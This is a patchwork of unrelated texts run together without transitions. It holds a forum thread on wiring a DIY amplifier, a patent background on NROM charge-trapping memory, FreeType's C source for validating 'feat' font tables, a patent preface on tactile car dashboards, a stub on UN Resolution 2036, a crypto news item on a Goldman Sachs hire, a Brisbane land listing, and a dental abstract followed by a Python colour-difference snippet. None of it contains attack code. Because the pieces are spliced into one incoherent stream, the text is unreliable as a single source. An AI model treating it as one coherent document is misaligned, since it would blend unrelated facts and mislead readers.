I was talking to Bob about doing it like this, but he agreed that it would become too difficult to get all of the wiring in after the components are in... If you get further along on this, please PM me some photos, I would really enjoy looking at them!
I got the first amp all wired up, it comes on, and with an iPod plugged in with an RCA to headphone jack adapter it plays music!!! One problem.... When I take the RCAs off I get something that sounds like the THX surround sound track..... I have no idea what is causing this, YET... I am taking a break, maybe then I can figure it out.
Here is a photo of the final wiring:
AlexSauter wrote:I got the first amp all wired up, it comes on, with an iPod plugged in with an RAC to Headphone jack it plays music!!! One problem.... When I take the RCA's off I get something that sounds like the THX surround sound track..... I have no idea what is causing this, YET... I am taking a break, maybe then I can figure it out.
Looks great Alex! You'll figure it out...faith!!!
It is about time The King moves into the world of surround sound.
All kidding aside, Alex, I have confidence you will figure this one out. The wiring looks exceptional, by the way.
To argue with a person who has renounced the use of reason is like administering medicine to the dead. — Thomas Paine
"Try not to become a man of success, but rather a man of value" Albert Einstein
"Politicians are the only people in the world who create problems and then campaign against them". Charlie Reese
"The problems we face today exist because the people who work for a living are outnumbered by those who vote for a living." Brad Shurett
"Kindness is a language that the Deaf can hear and the Blind can see." Mark Twain
Non-volatile memory cells that are electrically programmable and erasable can be realized as charge-trapping memory cells, which comprise a memory layer sequence of dielectric materials, which is provided for charge-trapping in a memory layer that is arranged between confinement layers. The confinement layers have a larger energy band gap than the memory layer. The memory layer can be silicon nitride, while the confinement layers are usually silicon oxide. The memory layer sequence is arranged between a channel region that is located within a semiconductor body and a gate electrode that is arranged above the channel region and is provided to control the channel by means of an applied electric voltage. Charge carriers moving from source to drain through the channel region are accelerated and gain enough energy to be able to pass the lower confinement layer and to be trapped in the memory layer. The trapped charge carriers change the threshold voltage of the cell transistor structure.
A publication by B. Eitan et al., “NROM: a Novel Localized Trapping, 2-Bit Nonvolatile Memory Cell” in IEEE Electron Device Letters, volume 21, pages 543 to 545 (2000), describes a charge-trapping memory cell with a memory layer sequence of oxide, nitride and oxide, which is especially adapted to be operated with a reading voltage that is reverse to the programming voltage (reverse read). This publication is incorporated herein by reference. The oxide-nitride-oxide layer sequence is especially designed to avoid the direct tunneling regime and to guarantee the vertical retention of the trapped charge carriers. The oxide layers are specified to have a thickness of more than 5 nm. Two bits of information can be stored in every memory cell.
The ONO (oxide-nitride-oxide) sequence is grown or deposited onto a main surface of a semiconductor substrate in such a fashion that it extends over the complete area provided for the memory cell array before other method steps are performed. These further method steps include a deposition and structuring of wordline stacks comprising the gate electrodes and an implantation of the source and drain regions. The effective channel width of the charge-trapping memory cells is crucially affected by the final top width of the shallow trench isolations, which are provided to electrically insulate columns of memory cells within the array. Other important factors are the step height of the trench fillings and the thickness of the ONO layer. There is a plurality of other process steps that also affect the performance of the memory cells. These concern the exact dimensions of the insulating trenches and the thickness of the trench filling as well as several method steps by which auxiliary or sacrificial layers are removed or structured. Inevitable variations of the process parameters result in a threshold voltage distribution that is too broad and in degraded retention-after-cycling (RAC) values. A further miniaturization of the memory devices will probably aggravate these problems.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
/***************************************************************************/
/* */
/* gxvfeat.c */
/* */
/* TrueTypeGX/AAT feat table validation (body). */
/* */
/* Copyright 2004-2018 by */
/* suzuki toshiya, Masatake YAMATO, Red Hat K.K., */
/* David Turner, Robert Wilhelm, and Werner Lemberg. */
/* */
/* This file is part of the FreeType project, and may only be used, */
/* modified, and distributed under the terms of the FreeType project */
/* license, LICENSE.TXT. By continuing to use, modify, or distribute */
/* this file you indicate that you have read the license and */
/* understand and accept it fully. */
/* */
/***************************************************************************/
/***************************************************************************/
/* */
/* gxvalid is derived from both gxlayout module and otvalid module. */
/* Development of gxlayout is supported by the Information-technology */
/* Promotion Agency(IPA), Japan. */
/* */
/***************************************************************************/
#include "gxvalid.h"
#include "gxvcommn.h"
#include "gxvfeat.h"
/*************************************************************************/
/* */
/* The macro FT_COMPONENT is used in trace mode. It is an implicit */
/* parameter of the FT_TRACE() and FT_ERROR() macros, used to print/log */
/* messages during execution. */
/* */
#undef FT_COMPONENT
#define FT_COMPONENT trace_gxvfeat
/*************************************************************************/
/*************************************************************************/
/***** *****/
/***** Data and Types *****/
/***** *****/
/*************************************************************************/
/*************************************************************************/
typedef struct GXV_feat_DataRec_
{
FT_UInt reserved_size;
FT_UShort feature;
FT_UShort setting;
} GXV_feat_DataRec, *GXV_feat_Data;
#define GXV_FEAT_DATA( field ) GXV_TABLE_DATA( feat, field )
typedef enum GXV_FeatureFlagsMask_
{
GXV_FEAT_MASK_EXCLUSIVE_SETTINGS = 0x8000U,
GXV_FEAT_MASK_DYNAMIC_DEFAULT = 0x4000,
GXV_FEAT_MASK_UNUSED = 0x3F00,
GXV_FEAT_MASK_DEFAULT_SETTING = 0x00FF
} GXV_FeatureFlagsMask;
/*************************************************************************/
/*************************************************************************/
/***** *****/
/***** UTILITY FUNCTIONS *****/
/***** *****/
/*************************************************************************/
/*************************************************************************/
static void
gxv_feat_registry_validate( FT_UShort feature,
FT_UShort nSettings,
FT_Bool exclusive,
GXV_Validator gxvalid )
{
GXV_NAME_ENTER( "feature in registry" );
GXV_TRACE(( " (feature = %u)\n", feature ));
if ( feature >= gxv_feat_registry_length )
{
GXV_TRACE(( "feature number %d is out of range %d\n",
feature, gxv_feat_registry_length ));
GXV_SET_ERR_IF_PARANOID( FT_INVALID_DATA );
goto Exit;
}
if ( gxv_feat_registry[feature].existence == 0 )
{
GXV_TRACE(( "feature number %d is in defined range but doesn't exist\n",
feature ));
GXV_SET_ERR_IF_PARANOID( FT_INVALID_DATA );
goto Exit;
}
if ( gxv_feat_registry[feature].apple_reserved )
{
/* Don't use here. Apple is reserved. */
GXV_TRACE(( "feature number %d is reserved by Apple\n", feature ));
if ( gxvalid->root->level >= FT_VALIDATE_TIGHT )
FT_INVALID_DATA;
}
if ( nSettings != gxv_feat_registry[feature].nSettings )
{
GXV_TRACE(( "feature %d: nSettings %d != defined nSettings %d\n",
feature, nSettings,
gxv_feat_registry[feature].nSettings ));
if ( gxvalid->root->level >= FT_VALIDATE_TIGHT )
FT_INVALID_DATA;
}
if ( exclusive != gxv_feat_registry[feature].exclusive )
{
GXV_TRACE(( "exclusive flag %d differs from predefined value\n",
exclusive ));
if ( gxvalid->root->level >= FT_VALIDATE_TIGHT )
FT_INVALID_DATA;
}
Exit:
GXV_EXIT;
}
static void
gxv_feat_name_index_validate( FT_Bytes table,
FT_Bytes limit,
GXV_Validator gxvalid )
{
FT_Bytes p = table;
FT_Short nameIndex;
GXV_NAME_ENTER( "nameIndex" );
GXV_LIMIT_CHECK( 2 );
nameIndex = FT_NEXT_SHORT ( p );
GXV_TRACE(( " (nameIndex = %d)\n", nameIndex ));
gxv_sfntName_validate( (FT_UShort)nameIndex,
255,
32768U,
gxvalid );
GXV_EXIT;
}
static void
gxv_feat_setting_validate( FT_Bytes table,
FT_Bytes limit,
FT_Bool exclusive,
GXV_Validator gxvalid )
{
FT_Bytes p = table;
FT_UShort setting;
GXV_NAME_ENTER( "setting" );
GXV_LIMIT_CHECK( 2 );
setting = FT_NEXT_USHORT( p );
/* If we have exclusive setting, the setting should be odd. */
if ( exclusive && ( setting & 1 ) == 0 )
FT_INVALID_DATA;
gxv_feat_name_index_validate( p, limit, gxvalid );
GXV_FEAT_DATA( setting ) = setting;
GXV_EXIT;
}
static void
gxv_feat_name_validate( FT_Bytes table,
FT_Bytes limit,
GXV_Validator gxvalid )
{
FT_Bytes p = table;
FT_UInt reserved_size = GXV_FEAT_DATA( reserved_size );
FT_UShort feature;
FT_UShort nSettings;
FT_ULong settingTable;
FT_UShort featureFlags;
FT_Bool exclusive;
FT_Int last_setting;
FT_UInt i;
GXV_NAME_ENTER( "name" );
/* feature + nSettings + settingTable + featureFlags */
GXV_LIMIT_CHECK( 2 + 2 + 4 + 2 );
feature = FT_NEXT_USHORT( p );
GXV_FEAT_DATA( feature ) = feature;
nSettings = FT_NEXT_USHORT( p );
settingTable = FT_NEXT_ULONG ( p );
featureFlags = FT_NEXT_USHORT( p );
if ( settingTable < reserved_size )
FT_INVALID_OFFSET;
if ( ( featureFlags & GXV_FEAT_MASK_UNUSED ) == 0 )
GXV_SET_ERR_IF_PARANOID( FT_INVALID_DATA );
exclusive = FT_BOOL( featureFlags & GXV_FEAT_MASK_EXCLUSIVE_SETTINGS );
if ( exclusive )
{
FT_Byte dynamic_default;
if ( featureFlags & GXV_FEAT_MASK_DYNAMIC_DEFAULT )
dynamic_default = (FT_Byte)( featureFlags &
GXV_FEAT_MASK_DEFAULT_SETTING );
else
dynamic_default = 0;
/* If exclusive, check whether default setting is in the range. */
if ( !( dynamic_default < nSettings ) )
FT_INVALID_FORMAT;
}
gxv_feat_registry_validate( feature, nSettings, exclusive, gxvalid );
gxv_feat_name_index_validate( p, limit, gxvalid );
p = gxvalid->root->base + settingTable;
for ( last_setting = -1, i = 0; i < nSettings; i++ )
{
gxv_feat_setting_validate( p, limit, exclusive, gxvalid );
if ( (FT_Int)GXV_FEAT_DATA( setting ) <= last_setting )
GXV_SET_ERR_IF_PARANOID( FT_INVALID_FORMAT );
last_setting = (FT_Int)GXV_FEAT_DATA( setting );
/* setting + nameIndex */
p += ( 2 + 2 );
}
GXV_EXIT;
}
/*************************************************************************/
/*************************************************************************/
/***** *****/
/***** feat TABLE *****/
/***** *****/
/*************************************************************************/
/*************************************************************************/
FT_LOCAL_DEF( void )
gxv_feat_validate( FT_Bytes table,
FT_Face face,
FT_Validator ftvalid )
{
GXV_ValidatorRec gxvalidrec;
GXV_Validator gxvalid = &gxvalidrec;
GXV_feat_DataRec featrec;
GXV_feat_Data feat = &featrec;
FT_Bytes p = table;
FT_Bytes limit = 0;
FT_UInt featureNameCount;
FT_UInt i;
FT_Int last_feature;
gxvalid->root = ftvalid;
gxvalid->table_data = feat;
gxvalid->face = face;
FT_TRACE3(( "validating `feat' table\n" ));
GXV_INIT;
feat->reserved_size = 0;
/* version + featureNameCount + none_0 + none_1 */
GXV_LIMIT_CHECK( 4 + 2 + 2 + 4 );
feat->reserved_size += 4 + 2 + 2 + 4;
if ( FT_NEXT_ULONG( p ) != 0x00010000UL ) /* Version */
FT_INVALID_FORMAT;
featureNameCount = FT_NEXT_USHORT( p );
GXV_TRACE(( " (featureNameCount = %d)\n", featureNameCount ));
if ( !( IS_PARANOID_VALIDATION ) )
p += 6; /* skip (none) and (none) */
else
{
if ( FT_NEXT_USHORT( p ) != 0 )
FT_INVALID_DATA;
if ( FT_NEXT_ULONG( p ) != 0 )
FT_INVALID_DATA;
}
feat->reserved_size += featureNameCount * ( 2 + 2 + 4 + 2 + 2 );
for ( last_feature = -1, i = 0; i < featureNameCount; i++ )
{
gxv_feat_name_validate( p, limit, gxvalid );
if ( (FT_Int)GXV_FEAT_DATA( feature ) <= last_feature )
GXV_SET_ERR_IF_PARANOID( FT_INVALID_FORMAT );
last_feature = GXV_FEAT_DATA( feature );
p += 2 + 2 + 4 + 2 + 2;
}
FT_TRACE4(( "\n" ));
}
/* END */
Preface
This invention seeks to dramatically increase the utility of car informational displays and controls, while at the same time enhancing safety by improving sensory data presentation and ease of interaction with vehicle controls and data sources. The programmable nature of the disclosed devices also creates new methods for how data is delivered and utilized.
The disclosed invention, including co-pending applications incorporated by reference, contains unique embodiments which allow one to interact, by feel, with a display, called herein a “programmable tactile display”. It encompasses two main focus areas: A display having features commonly associated with a touch screen, but in a new form which can be sensed in several tactile manners, as well as visually. A tactile selection or adjustment means, such as a knob, slider, or switch, programmable in its tactile or visual nature, and generally operated in conjunction with the touch screen just described.
These features in turn provide the basis for an automobile instrument panel (dashboard) or other control panel which can be operated without undue concentration on visually reading the display while working the controls. It serves as an alternative, or adjunct, to voice-activated systems being considered today to allow increased functionality with safety of vehicle operation. In several embodiments, the force or other sensation felt can itself be programmably changed, adding to driver understanding and enhancing safety.
Because it resembles today's dashboards, and can be used for the basic control functions of the vehicle, the invention provides not only a potential means of telematic connectivity while driving (e.g. with the internet, cellular telephonic sources or the like), but a much more useful display and control system capable of many more functions—including the primary vehicle control functions, if desired.
In addition, I feel that a dashboard incorporating the invention can be built at lower cost than a conventional dashboard, especially as vehicles become ever more loaded up with navigational systems and other electronic functions incidental to the control of the vehicle.
There is no known prior art having the above characteristics.
United Nations Security Council Resolution 2036
United Nations Security Council Resolution 2036 was unanimously adopted on 22 February 2012.
See also
List of United Nations Security Council Resolutions 2001 to 2100
References
External links
Text of the Resolution at undocs.org
Category:2012 United Nations Security Council resolutions
Category:United Nations Security Council resolutions concerning Somalia
Category:2012 in Somalia
Category:February 2012 events
Goldman Sachs Hires Crypto Trader ‘In Response to Client Interest’
Goldman Sachs has had its feelers in the cryptocurrency waters for a while. Now, the Wall Street giant looks set to take the plunge, having just hired a cryptocurrency trader to help the company expand into digital asset markets.
High Profile Hire
With Bitcoin looking rather bullish once more, Goldman Sachs is getting serious about cryptocurrency.
Goldman Sachs has hired former trader Justin Schmidt to head digital asset markets in the securities division of the multinational investment bank and financial services company, as reported by Tearsheet.
Schmidt, who assumed the position on April 16, previously served as both a senior VP at Seven Eight Capital and portfolio manager at LMR Partners.
Institutional Investment Inbound
The new addition to Goldman Sachs’ team reflects the dramatic increase in institutional interest in Bitcoin over recent months.
Reports first surfaced regarding the Wall Street giant’s plans to launch a cryptocurrency trading desk in December, though the financial institution has repeatedly denied the claims.
Goldman Sachs did, however, help fund peer-to-peer payments technology company Circle in 2015. As reported by Bitcoinist yesterday, the Goldman-funded company recently doubled its minimum cryptocurrency trade requirement from $250,000 to $500,000 — citing the fact that “the market is robust.”
Indeed, the cryptocurrency market’s purported robustness has increased interest from high-net-worth clients at high-profile investment banks. Said Goldman Sachs spokeswoman Tiffany Galvin-Cohen:
In response to client interest in various digital products, we are exploring how best to serve them in the space. At this point, we have not reached a conclusion on the scope of our digital asset offering.
Singing a Different Song
Of course, Goldman hasn’t always been particularly bullish on Bitcoin and cryptocurrencies in general.
The financial behemoth’s head of global investment research Steve Strongin pronounced the eventual death of all but “a handful” of cryptocurrencies in February — stating that “most, if not all, will never see their recent peaks again.”
Later, in March, Goldman Sachs analysts forecast a bearish return to recent lows below $6000 for Bitcoin. That prediction did not pan out, and such a return is looking less and less likely with each day — as evidenced by the company’s increased interest.
What do you think about Goldman Sachs’ latest hire? How high do you think institutional investment will push the value of Bitcoin and other cryptocurrencies in the future? Let us know in the comments below!
Images courtesy of AP, Bitcoinist archives, Shutterstock
35 Eversley Terrace, Yeronga, Qld 4104
Contact agent
residential land, Sold on 18 Dec 2017
Affordable land in premium location
Opportunities for land in the sought-after pocket of Yeronga are few and far between, however this is your opportunity to get in quick and secure this fantastic East facing 405m2 block with 10.05m frontage and City glimpse potential. This site is ready and waiting for your dream home.
- Easy stroll to local cafes and shops
- Parks and off-leash dog area within walking distance
- Walk to bus and train
- Sought after river precinct suburb
- Only 7kms to the Brisbane City with strong capital growth
- Bike paths and river walks close by
- Easy access to the M3 to travel to Brisbane, Gold Coast or Ipswich
- House and land packages available on request
- Approved plans available upon request
- Close to the Green Bridge, UQ and Hospitals
- Agent onsite on request
Colour stability of aesthetic brackets: ceramic and plastic.
The colour stability of aesthetic brackets may differ according to their composition, morphology and surface properties, which may consequently influence their aesthetic performance. The aim was to assess the colour stability of aesthetic (ceramic and plastic) brackets after simulated aging and staining. Twelve commercially manufactured ceramic brackets and four different plastic brackets were assessed. To determine possible colour change (ΔE*ab) and the value in NBS (National Bureau of Standards) units, spectrophotometric colour measurements for CIE L*, a* and b* were taken before and after the brackets were aged and stained. Statistical analysis was undertaken using one-way ANOVA and a Tukey multiple comparison test (alpha = 0.05). The colour change between the different materials (ceramic and plastic) was not significant (p > 0.05), but varied significantly (p < 0.001) between brackets of the same composition or crystalline structure and among commercial brands. Colour stability cannot be predicted simply by knowing the type of material and crystalline composition or structure.
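The colour difference used in this kind of study can be illustrated with a short sketch. The readings and the 0.92 NBS conversion factor below are assumptions for illustration, not data from the abstract:

```python
import math

def delta_e_ab(lab1, lab2):
    """CIE76 colour difference Delta E*ab between two (L*, a*, b*) readings."""
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(lab1, lab2)))

def nbs_units(delta_e):
    """Convert Delta E*ab to NBS units (commonly quoted factor of 0.92)."""
    return 0.92 * delta_e

# Hypothetical before/after measurements for one bracket:
before = (50.0, 10.0, 10.0)
after = (53.0, 14.0, 22.0)
print(delta_e_ab(before, after))  # -> 13.0
```

A ΔE*ab of 0 would mean no measurable colour change; larger values indicate progressively more visible staining.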